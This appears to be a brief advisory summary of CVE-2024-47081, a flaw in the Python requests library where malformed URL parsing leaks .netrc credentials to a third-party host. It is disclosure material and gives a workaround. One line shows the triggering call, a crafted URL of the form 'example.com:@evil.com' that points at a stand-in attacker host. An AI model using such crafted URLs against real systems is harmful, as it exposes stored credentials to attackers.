CVE-2024-47081: Netrc credential leak in PSF requests library
a year ago
- #vulnerability
- #python
- #security
- PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing.
- Vulnerability triggered by API call: requests.get('http://example.com:@evil.com/').
- Credentials configured for example.com are leaked to evil.com.
- Root cause identified in requests/utils.py file.
- Vulnerability reported to maintainers on September 12, 2024, with no fix available.
- CVE-2024-47081 assigned by GitHub for this issue.
- Workaround: Explicitly specify credentials in API calls to disable .netrc access.